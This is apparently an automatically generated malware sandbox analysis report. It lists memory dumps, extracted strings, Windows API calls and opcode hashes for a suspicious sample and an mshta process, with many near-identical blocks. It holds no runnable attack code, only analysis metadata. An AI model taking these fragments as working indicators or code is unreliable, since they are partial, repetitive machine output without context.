                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $i$l$o$u
                                                                                                                                                                                                                                                • API String ID: 0-2051669658
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $i$l$o$u
                                                                                                                                                                                                                                                • API String ID: 0-2051669658
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .d(%$.d(%;,$;,$F9p{$p{8@
                                                                                                                                                                                                                                                • API String ID: 0-1236092993
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$h$o
                                                                                                                                                                                                                                                • API String ID: 0-3662636641
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                                                • API String ID: 0-2877786613
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                                                • API String ID: 0-2877786613
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$h$o
                                                                                                                                                                                                                                                • API String ID: 0-3662636641
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                • Opcode ID: 3fb1dcc21cc91a4b041918479df166f89adabaa798cda0c0ac0c735a21ca4bdb
                                                                                                                                                                                                                                                • Instruction ID: b2ca82e1a829f315d1dbb54b7eea9dfa9bbb1265c3b455b91bf496c7bb75648f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb1dcc21cc91a4b041918479df166f89adabaa798cda0c0ac0c735a21ca4bdb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B0196B2900218EBDB14DF98D8C4ADEF7B9FF08714F048259E9155B205E771F945CBA0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:2.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                                                                                                                                Signature Coverage:2.2%
                                                                                                                                                                                                                                                Total number of Nodes:458
                                                                                                                                                                                                                                                Total number of Limit Nodes:75

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !$'x$+K$2l$7R$9$;$A$B$B_$Fe$L$L}$M/$PK$W$X6$XZ$[J$`$b}$c]$g$gJFe${b$~y$V
                                                                                                                                                                                                                                                • API String ID: 0-2671176807
                                                                                                                                                                                                                                                • Opcode ID: d998aaa6e5b9bf86649a4d0fc7b502850b9c9dc8653dfc566b95174ca8572816
                                                                                                                                                                                                                                                • Instruction ID: a56e7bb4b4cfc55432775b1bea699f7c9990e802254b3dd39d51b1095d3cdc22
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d998aaa6e5b9bf86649a4d0fc7b502850b9c9dc8653dfc566b95174ca8572816
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7429FB0E05629CBEB64CF44CD94BD9BBB2BB45308F1081D9D20D6B290DBB95AC8CF55
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F3C471
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02F3C4AE
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 02F3C4B9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                • Opcode ID: a680eb3841f0e9fac18bf206ee4c7027eb8b63656caed27519784e8d5f45afce
                                                                                                                                                                                                                                                • Instruction ID: eb0bfc14aba10b8e4536ef69a3ff0dbb4e79f45838507524b4f06fa70d76876b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a680eb3841f0e9fac18bf206ee4c7027eb8b63656caed27519784e8d5f45afce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 513196719003097BDB21DBA0CD85FFF777D9F44794F144459FA08A7181DBB4AA848BA4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(02F31B9E,?,02F47D3E,00000000,00000004,00003000,?,?,?,?,?,02F47D3E,02F31B9E,02F47D3E,E8565751,02F31B9E), ref: 02F49348
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                • String ID: QWV
                                                                                                                                                                                                                                                • API String ID: 2167126740-1719063439
                                                                                                                                                                                                                                                • Opcode ID: fdc5077bbbfd4eba5edcaab04226d6d8d96cb4e6f903cdcba52ef66698f93ba2
                                                                                                                                                                                                                                                • Instruction ID: 6b49004d4cef6305c6bb5f0cc0fa14613c6e54757383c763be30e294a88a0711
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdc5077bbbfd4eba5edcaab04226d6d8d96cb4e6f903cdcba52ef66698f93ba2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B212F75A00209ABDB10DF98DC41EEFB7B9FF89740F108509FD58A7240DB70A9118BA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F48F0B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction ID: b3536d61bfded3fe2e387d11e2d0b802a59f781f65e7f502015ff691e31552d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431CA75A00208AFDB14DF98D880EDEB7F9EF8D354F108609F918A7340D770A841CBA4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F49066
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                • Opcode ID: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction ID: d81f917ec73bfa1886e60db241ad29dd9d759e278f3625bf064a92c92173f840
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C31D975A00608ABDB14DF98D881EEFB7F9EF89754F108209F918A7240DB70A9518BA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                • Opcode ID: e790bde1dedf81e8befb819c3047ab98e8e37d91b0426183d763296c5cdb5dad
                                                                                                                                                                                                                                                • Instruction ID: 5f79a48b2a2df5e1677f3a8e616ec5dc8bc5663541715b42f667f3d41d90c79f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e790bde1dedf81e8befb819c3047ab98e8e37d91b0426183d763296c5cdb5dad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A811CA71500608BAD720EB64CC41FEFB7ADEF85754F108509FA58A7240EBB17515CBE5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F49144
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                • Opcode ID: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction ID: 9b1bb9a91b7c40d855f10b3b7ac7e4d04453a981de68b43a609bf9150be2e39c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8E086312402147BD120EB59DC01FDB779DDFC6760F008015FA4DA7241CA71790587F4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                                                                                                                                                                                                                • Instruction ID: 19e5261c85b1486048b72f5b89aa785ad2cd13cca9127b93551e36e6c1d2ec4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B90023160580516A540B1984C84546404597E1301B69C052E142C554C8B148A5A5366
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                                                                                                                                                                                                                • Instruction ID: 68dcae721359c8d42365ee171a57110785b7b8c885c5f8566701410145e8a8ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53900261601505465540B1984C04406604597E23013A9C156A155C560C87188959926E
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 36affb0677102594f73cdec3dd3238e5f25fa69ffd23f61bd1ab682be2d9913b
                                                                                                                                                                                                                                                • Instruction ID: a275ddf1bf5dc22e51931cf423c9ad421419a45e3177628bf79de0df21e89815
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36affb0677102594f73cdec3dd3238e5f25fa69ffd23f61bd1ab682be2d9913b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E990023160540D06E550B1984814746004587D1301F69C052A102C654D87558B5976A6
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 600f9e68c1ea5440bebcf475d0f73bec980b75fce24392144b008a8eca3d42f7
                                                                                                                                                                                                                                                • Instruction ID: da0eeec51a4125a0552e51de76356dec9bd5e4b090f28b8e1b7ad079e960bf18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 600f9e68c1ea5440bebcf475d0f73bec980b75fce24392144b008a8eca3d42f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A90023120544D46E540B1984804A46005587D1305F69C052A106C694D97258E59B666
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: f192a52f07af1e62ab639a6bc4a0d4e16db2a574b9fa099740f397d6a9a70091
                                                                                                                                                                                                                                                • Instruction ID: 97d9a3ce22a0c7d92cb794a83411c1d3350f015d48f28e946e17083d2bcf343a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f192a52f07af1e62ab639a6bc4a0d4e16db2a574b9fa099740f397d6a9a70091
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9690023120140D06E580B198480464A004587D2301FA9C056A102D654DCB158B5D77A6
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                                                                                                                                                                                                                • Instruction ID: b3e4fffde6fe7b85938b00e2acfb43f89456ebaaa423749f4c3747a901bcb5a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68900261202405075505B1984814616404A87E1201B69C062E201C590DC6258995612A
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                                                                                                                                                                                                                • Instruction ID: 2bb7818f778170ea65a4c91ab18bdecd34d9e9fb78ebf7c8f704f60232c07261
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5900225211405071505F5980B04507008687D6351369C062F201D550CD72189655126
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                                                                                                                                                                                                                • Instruction ID: 1dc2a3e11e818c6d3e8fa83d7cff075e60942350a2877ae9e8db76c750e66116
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
